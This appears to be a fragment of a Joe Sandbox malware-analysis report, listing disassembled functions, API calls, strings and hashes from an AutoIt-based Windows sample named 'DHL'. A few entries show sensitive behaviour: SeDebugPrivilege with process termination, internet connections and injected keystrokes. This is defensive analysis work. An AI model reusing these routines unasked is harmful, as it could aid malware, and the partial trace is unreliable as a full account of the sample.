                                                        • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,009E3AAF,?,?,Bad directive syntax error,00A3CC08,00000000,00000010,?,?,>>>AUTOIT SCRIPT<<<), ref: 00A098BC
                                                        • LoadStringW.USER32(00000000,?,009E3AAF,?), ref: 00A098C3
                                                          • Part of subcall function 009A9CB3: _wcslen.LIBCMT ref: 009A9CBD
                                                        • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00A09987
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: HandleLoadMessageModuleString_wcslen
                                                        • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                        • API String ID: 858772685-4153970271
                                                        • Opcode ID: 809f59ec3382d071659c7e6a36e2c747dd897016eb9c80cb3902f0fd4294b187
                                                        • Instruction ID: 96cc49f7d2de481051fe4fb4bc8c3fcabab06ce59793201d4c8eecda24e1a9e3
                                                        • Opcode Fuzzy Hash: 809f59ec3382d071659c7e6a36e2c747dd897016eb9c80cb3902f0fd4294b187
                                                        • Instruction Fuzzy Hash: F2215E3280021EBBCF15AF90DC0AFEE7775FF59750F048855F519660A2EB719A18DB90
                                                        APIs
                                                        • GetParent.USER32 ref: 00A020AB
                                                        • GetClassNameW.USER32(00000000,?,00000100), ref: 00A020C0
                                                        • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00A0214D
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: ClassMessageNameParentSend
                                                        • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                        • API String ID: 1290815626-3381328864
                                                        • Opcode ID: 7cebcfc61c1a7f3534ad06546cf53bc9c8bed775490db28397ffb8ed1d789716
                                                        • Instruction ID: ec5480b96ba095239378cf34aa45ea4913e9ecee284d714a8a20c87b0b3e2a97
                                                        • Opcode Fuzzy Hash: 7cebcfc61c1a7f3534ad06546cf53bc9c8bed775490db28397ffb8ed1d789716
                                                        • Instruction Fuzzy Hash: 1F110676A8870AB9FA156730EC0BFA677ACDF05324F20021AFB04A50D2FB6168525714
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: f27d7542c6ac0377cc8c09f42f805f5499b7b9e00f93881412ec57410231ad0e
                                                        • Instruction ID: fc2d978928b5d75ac175aaf0639bd599bf4e79686748b8e06014d135b454bd3e
                                                        • Opcode Fuzzy Hash: f27d7542c6ac0377cc8c09f42f805f5499b7b9e00f93881412ec57410231ad0e
                                                        • Instruction Fuzzy Hash: 09C1F474E44249AFDB11EFECDC41BAEBBB5AF49310F04809AF418AB392C7349941CB61
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: _free$EnvironmentVariable___from_strstr_to_strchr
                                                        • String ID:
                                                        • API String ID: 1282221369-0
                                                        • Opcode ID: 9577f34adc0471b7e0ffac6e54c711d6a98ec09c95cf94f502a4deca66a3342e
                                                        • Instruction ID: fa9551e5d71f5c7b446afcbecf8532bf6d25afb5a81c374dacb7d7c4d4954536
                                                        • Opcode Fuzzy Hash: 9577f34adc0471b7e0ffac6e54c711d6a98ec09c95cf94f502a4deca66a3342e
                                                        • Instruction Fuzzy Hash: 386116B1A84302AFDB21AFB8DC95BAA7BA9EF45310F04C16FF944A7382D6319D41D750
                                                        APIs
                                                        • SendMessageW.USER32(?,00002001,00000000,00000000), ref: 00A35186
                                                        • ShowWindow.USER32(?,00000000), ref: 00A351C7
                                                        • ShowWindow.USER32(?,00000005,?,00000000), ref: 00A351CD
                                                        • SetFocus.USER32(?,?,00000005,?,00000000), ref: 00A351D1
                                                          • Part of subcall function 00A36FBA: DeleteObject.GDI32(00000000), ref: 00A36FE6
                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00A3520D
                                                        • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00A3521A
                                                        • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00A3524D
                                                        • SendMessageW.USER32(?,00001001,00000000,000000FE), ref: 00A35287
                                                        • SendMessageW.USER32(?,00001026,00000000,000000FE), ref: 00A35296
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: Window$MessageSend$LongShow$DeleteFocusInvalidateObjectRect
                                                        • String ID:
                                                        • API String ID: 3210457359-0
                                                        • Opcode ID: 2ec9a92a083257c76b5c026025f717f46ee21c511a6e1f1aa76e498cc451fcc3
                                                        • Instruction ID: 986e9c68af255ecaf555b48ab965b4c230d42c3da057af32bc4d79daba8b8e6e
                                                        • Opcode Fuzzy Hash: 2ec9a92a083257c76b5c026025f717f46ee21c511a6e1f1aa76e498cc451fcc3
                                                        • Instruction Fuzzy Hash: 1C518130E50A08BFEF20AFBCCC46BD97BB5EB05721F148611FA15962E1C775A990DB41
                                                        APIs
                                                        • LoadImageW.USER32(00000000,?,?,00000010,00000010,00000010), ref: 009F6890
                                                        • ExtractIconExW.SHELL32(?,?,00000000,00000000,00000001), ref: 009F68A9
                                                        • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 009F68B9
                                                        • ExtractIconExW.SHELL32(?,?,?,00000000,00000001), ref: 009F68D1
                                                        • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 009F68F2
                                                        • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,009B8874,00000000,00000000,00000000,000000FF,00000000), ref: 009F6901
                                                        • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 009F691E
                                                        • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,009B8874,00000000,00000000,00000000,000000FF,00000000), ref: 009F692D
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: Icon$DestroyExtractImageLoadMessageSend
                                                        • String ID:
                                                        • API String ID: 1268354404-0
                                                        • Opcode ID: 01db94e7c2b6247e2e0fea1acf247eb4bd8e74f4940d231689fe499b26f59069
                                                        • Instruction ID: 0063f3eb74abcc9668442919d866813599df57b5553dbf41e36c6f4908994ef3
                                                        • Opcode Fuzzy Hash: 01db94e7c2b6247e2e0fea1acf247eb4bd8e74f4940d231689fe499b26f59069
                                                        • Instruction Fuzzy Hash: DB517B70600309EFDB20CF64CD55FAA7BB9FB48760F104518FA56A72A0DB74E991DB50
                                                        APIs
                                                        • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00A1C182
                                                        • GetLastError.KERNEL32 ref: 00A1C195
                                                        • SetEvent.KERNEL32(?), ref: 00A1C1A9
                                                          • Part of subcall function 00A1C253: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00A1C272
                                                          • Part of subcall function 00A1C253: GetLastError.KERNEL32 ref: 00A1C322
                                                          • Part of subcall function 00A1C253: SetEvent.KERNEL32(?), ref: 00A1C336
                                                          • Part of subcall function 00A1C253: InternetCloseHandle.WININET(00000000), ref: 00A1C341
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
                                                        • String ID:
                                                        • API String ID: 337547030-0
                                                        • Opcode ID: eedea510066a9779c3fb9aa7e36a415ad067509c8f14726f5c52abca2aaa8d15
                                                        • Instruction ID: 14d79ef7905963ce8186146ea5c698b9b6263601f6f79605f870feadf09c17a1
                                                        • Opcode Fuzzy Hash: eedea510066a9779c3fb9aa7e36a415ad067509c8f14726f5c52abca2aaa8d15
                                                        • Instruction Fuzzy Hash: EF31AC71280701BFDB21AFE5DD08AEBBBF8FF18320B00451DF95696610D730E8959BA0
                                                        APIs
                                                          • Part of subcall function 00A03A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00A03A57
                                                          • Part of subcall function 00A03A3D: GetCurrentThreadId.KERNEL32 ref: 00A03A5E
                                                          • Part of subcall function 00A03A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00A025B3), ref: 00A03A65
                                                        • MapVirtualKeyW.USER32(00000025,00000000), ref: 00A025BD
                                                        • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00A025DB
                                                        • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 00A025DF
                                                        • MapVirtualKeyW.USER32(00000025,00000000), ref: 00A025E9
                                                        • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00A02601
                                                        • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000), ref: 00A02605
                                                        • MapVirtualKeyW.USER32(00000025,00000000), ref: 00A0260F
                                                        • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00A02623
                                                        • Sleep.KERNEL32(00000000,?,00000101,00000027,00000000,?,00000100,00000027,00000000), ref: 00A02627
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                        • String ID:
                                                        • API String ID: 2014098862-0
                                                        • Opcode ID: f5fc4c2a4d2cacb09fde515c783c773ec01470c14a3771ad3068200eb42e4673
                                                        • Instruction ID: ab7ec1c9c153d2d9dfb5b83d77f83854def5b1150ab9dc458c539a45f8547e28
                                                        • Opcode Fuzzy Hash: f5fc4c2a4d2cacb09fde515c783c773ec01470c14a3771ad3068200eb42e4673
                                                        • Instruction Fuzzy Hash: 7B01D431390324BBFB10A7A89C8EF593F59DB4EB62F100011F318BE0D1C9E224459B69
                                                        APIs
                                                        • GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,00A01449,?,?,00000000), ref: 00A0180C
                                                        • HeapAlloc.KERNEL32(00000000,?,00A01449,?,?,00000000), ref: 00A01813
                                                        • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00A01449,?,?,00000000), ref: 00A01828
                                                        • GetCurrentProcess.KERNEL32(?,00000000,?,00A01449,?,?,00000000), ref: 00A01830
                                                        • DuplicateHandle.KERNEL32(00000000,?,00A01449,?,?,00000000), ref: 00A01833
                                                        • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00A01449,?,?,00000000), ref: 00A01843
                                                        • GetCurrentProcess.KERNEL32(00A01449,00000000,?,00A01449,?,?,00000000), ref: 00A0184B
                                                        • DuplicateHandle.KERNEL32(00000000,?,00A01449,?,?,00000000), ref: 00A0184E
                                                        • CreateThread.KERNEL32(00000000,00000000,00A01874,00000000,00000000,00000000), ref: 00A01868
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                        • String ID:
                                                        • API String ID: 1957940570-0
                                                        • Opcode ID: ae942e935c58f69a8d79e6edf9585baec7c2f1f13731f0ccdc61e5099978ad02
                                                        • Instruction ID: ecd668bbfdbd3e2f0d8af9d8dcc1246b3300288bf70acfe4f49b8e9e20680dc6
                                                        • Opcode Fuzzy Hash: ae942e935c58f69a8d79e6edf9585baec7c2f1f13731f0ccdc61e5099978ad02
                                                        • Instruction Fuzzy Hash: 4B01BBB5240308BFE750EBA5DC8DF6B7BACEB89B11F008511FA05EB1A1CA70D811DB20
                                                        APIs
                                                          • Part of subcall function 00A0D4DC: CreateToolhelp32Snapshot.KERNEL32 ref: 00A0D501
                                                          • Part of subcall function 00A0D4DC: Process32FirstW.KERNEL32(00000000,?), ref: 00A0D50F
                                                          • Part of subcall function 00A0D4DC: CloseHandle.KERNEL32(00000000), ref: 00A0D5DC
                                                        • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00A2A16D
                                                        • GetLastError.KERNEL32 ref: 00A2A180
                                                        • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00A2A1B3
                                                        • TerminateProcess.KERNEL32(00000000,00000000), ref: 00A2A268
                                                        • GetLastError.KERNEL32(00000000), ref: 00A2A273
                                                        • CloseHandle.KERNEL32(00000000), ref: 00A2A2C4
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                        • String ID: SeDebugPrivilege
                                                        • API String ID: 2533919879-2896544425
                                                        • Opcode ID: 7b1d0697e086dbcb8dee47f6c8422ed729446ec50e34c75a9d5a346e40d427ca
                                                        • Instruction ID: 5a0a4ddcf33989ca041fc5a12fb822453e3278db56ac0e6370b74b040c508d8d
                                                        • Opcode Fuzzy Hash: 7b1d0697e086dbcb8dee47f6c8422ed729446ec50e34c75a9d5a346e40d427ca
                                                        • Instruction Fuzzy Hash: E3618D712042529FD720DF18D894F59BBE1AF55318F1884ACE4668F7A3C772EC46CB92
                                                        APIs
                                                        • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00A33925
                                                        • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 00A3393A
                                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00A33954
                                                        • _wcslen.LIBCMT ref: 00A33999
                                                        • SendMessageW.USER32(?,00001057,00000000,?), ref: 00A339C6
                                                        • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00A339F4
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$Window_wcslen
                                                        • String ID: SysListView32
                                                        • API String ID: 2147712094-78025650
                                                        • Opcode ID: aef8250fd5b28b22654af41b1ddeb3207e930394310232e0b8b5f06cf922aab8
                                                        • Instruction ID: 927b2fcc3facf4448bf514b0908d89bf8ab784947d4bd9f91f69c5c2cef2d03a
                                                        • Opcode Fuzzy Hash: aef8250fd5b28b22654af41b1ddeb3207e930394310232e0b8b5f06cf922aab8
                                                        • Instruction Fuzzy Hash: 9741A272A04218ABEF21DF64CC45FEA7BA9FF48350F100526F958E7281D7759D80CB90
                                                        APIs
                                                        • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00A0BCFD
                                                        • IsMenu.USER32(00000000), ref: 00A0BD1D
                                                        • CreatePopupMenu.USER32 ref: 00A0BD53
                                                        • GetMenuItemCount.USER32(00D965C0), ref: 00A0BDA4
                                                        • InsertMenuItemW.USER32(00D965C0,?,00000001,00000030), ref: 00A0BDCC
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: Menu$Item$CountCreateInfoInsertPopup
                                                        • String ID: 0$2
                                                        • API String ID: 93392585-3793063076
                                                        • Opcode ID: 2981c632f711dde6b48c9619cd5e76bafda978f856bacec98e342ea843c501db
                                                        • Instruction ID: 4099de78204a15429d2b67e0dd93da1d26ef37e4cd10fe03cb34f22073599c8f
                                                        • Opcode Fuzzy Hash: 2981c632f711dde6b48c9619cd5e76bafda978f856bacec98e342ea843c501db
                                                        • Instruction Fuzzy Hash: 0B518C70A1020EDBDF10DFA8EA88BAEFBF4AF45324F148259E411A72D1D770A941CB71
                                                        APIs
                                                        • LoadIconW.USER32(00000000,00007F03), ref: 00A0C913
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: IconLoad
                                                        • String ID: blank$info$question$stop$warning
                                                        • API String ID: 2457776203-404129466
                                                        • Opcode ID: 44c9c358607a624d87db4f2526cb4917d93bdb4175da63c51515dbfad7107c38
                                                        • Instruction ID: 464da0baf17081643ea4cfac6069c93f4bc5987558b3bc7bf8587f81c1877da4
                                                        • Opcode Fuzzy Hash: 44c9c358607a624d87db4f2526cb4917d93bdb4175da63c51515dbfad7107c38
                                                        • Instruction Fuzzy Hash: 9C110D3278930EBAE7159B54BC83EAA77BCDF15374B10452EF904A62C3D7705D005269
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: _wcslen$LocalTime
                                                        • String ID:
                                                        • API String ID: 952045576-0
                                                        • Opcode ID: f71ef6f4ca4f39a9e63c3030d40513efb5c98400cac00b0d6d18d7a06f9a5da2
                                                        • Instruction ID: 92849fa9186dfff8c9e6b2087383ca6983f9ad97b41f1d3609befacc854953a5
                                                        • Opcode Fuzzy Hash: f71ef6f4ca4f39a9e63c3030d40513efb5c98400cac00b0d6d18d7a06f9a5da2
                                                        • Instruction Fuzzy Hash: 9441A465D1011876DB11EBF4CC8AFCFB7A8AF85750F50886AE528E3161FB34E245C3A6
                                                        APIs
                                                        • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,009F682C,00000004,00000000,00000000), ref: 009BF953
                                                        • ShowWindow.USER32(FFFFFFFF,00000006,?,00000000,?,009F682C,00000004,00000000,00000000), ref: 009FF3D1
                                                        • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,009F682C,00000004,00000000,00000000), ref: 009FF454
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: ShowWindow
                                                        • String ID:
                                                        • API String ID: 1268545403-0
                                                        • Opcode ID: 57101e576131facc66bdf26e2ffe353f7096d3f795e1b860e83eca6b58354e73
                                                        • Instruction ID: 8306055783defc0a8e1d6dc7762e2530c5452924b0acc044e48032fc3e216409
                                                        • Opcode Fuzzy Hash: 57101e576131facc66bdf26e2ffe353f7096d3f795e1b860e83eca6b58354e73
                                                        • Instruction Fuzzy Hash: B7412831208680FAC739CB2C8EB87BA7B99AF46370F14443CF18762560D675A881CB11
                                                        APIs
                                                        • DeleteObject.GDI32(00000000), ref: 00A32D1B
                                                        • GetDC.USER32(00000000), ref: 00A32D23
                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00A32D2E
                                                        • ReleaseDC.USER32(00000000,00000000), ref: 00A32D3A
                                                        • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00A32D76
                                                        • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00A32D87
